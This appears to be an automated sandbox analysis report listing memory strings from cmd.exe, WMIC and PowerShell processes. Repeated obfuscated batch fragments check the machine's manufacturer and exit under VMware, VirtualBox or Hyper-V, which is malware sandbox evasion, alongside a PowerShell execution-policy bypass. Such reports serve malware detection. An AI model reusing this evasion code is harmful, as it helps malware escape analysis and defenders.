(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oLoct
Source: chcp.com, 00000017.00000002.1444899157.0000020FEBA54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OO7q
Source: WMIC.exe, 0000001A.00000003.1458912614.000002894DA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit \0
Source: cmd.exe, 0000000B.00000003.1422648451.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1426145564.000002C1DCA5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=os
Source: cmd.exe, 0000000B.00000003.1425496788.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1433229188.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nz=o
Source: cmd.exe, 0000000B.00000003.1433377082.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oi
Source: WMIC.exe, 0000001A.00000002.1459553921.000002894DA49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\
Source: cmd.exe, 0000000B.00000003.1408115597.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsw
Source: powershell.exe, 00000029.00000002.1870747846.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=ORzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit
